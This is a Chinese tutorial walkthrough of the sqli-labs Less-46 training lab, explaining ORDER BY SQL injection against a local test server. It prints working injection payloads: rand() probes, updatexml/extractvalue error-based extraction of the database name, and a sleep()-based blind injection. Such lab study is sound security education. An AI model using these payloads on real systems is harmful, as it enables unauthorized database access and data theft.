sqli-labs(less-46)order by 注入

我们打开sql-labs的第46关然后在输入框内输入?id=1时会发现页面没有任何的变化,此时我们用Visual Studio Code查看第46关的代码

此时我们发现sql语句是$sql = "SELECT * FROM users ORDER BY $id"; ,所以现在我们需要了解一下order by语句的作用。

在SQL语句中,asc是指定列按升序排列,desc则 是指定列按降序排列。
select * from users order by 1 desc; 使用降序进行排列
select * from users order by 1 asc;使用升序进行排列

这时我们就知道了,sql语句只有order by后面的参数是我们可控的,所以我们可以输入?sort=1,在这里sort=1的意思就是以第一列数据也就是id进行排序。

sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=1
sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=2

此时我们输入?sort=2,就是以USERNAME进行排序。

输入?sort=3时,会以PASSWORD进行排序。

当我们输入?sort=4时会报错,因为没有第四列。

注入点测试

sql 复制代码
127.0.0.1/sincer/less-46/?sort=rand(true)
sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=rand(false)

报错注入(获取表名)

sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)

或者

sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=(extractvalue(1,concat(0x7e,(database()),0x7e)))--+

时间盲注

sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=1%20and%20if(substr(database(),1,1)=%27s%27,1,sleep(1))--+
相关推荐
独行soc1 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
White_Mountain1 小时前
在Ubuntu中配置mysql,并允许外部访问数据库
数据库·mysql·ubuntu
Code apprenticeship1 小时前
怎么利用Redis实现延时队列?
数据库·redis·缓存
百度智能云技术站1 小时前
广告投放系统成本降低 70%+,基于 Redis 容量型数据库 PegaDB 的方案设计和业务实践
数据库·redis·oracle
装不满的克莱因瓶1 小时前
【Redis经典面试题六】Redis的持久化机制是怎样的?
java·数据库·redis·持久化·aof·rdb
梦想平凡3 小时前
PHP 微信棋牌开发全解析:高级教程
android·数据库·oracle
TianyaOAO3 小时前
mysql的事务控制和数据库的备份和恢复
数据库·mysql
Ewen Seong3 小时前
mysql系列5—Innodb的缓存
数据库·mysql·缓存
码农老起4 小时前
企业如何通过TDSQL实现高效数据库迁移与性能优化
数据库·性能优化
夏木~5 小时前
Oracle 中什么情况下 可以使用 EXISTS 替代 IN 提高查询效率
数据库·oracle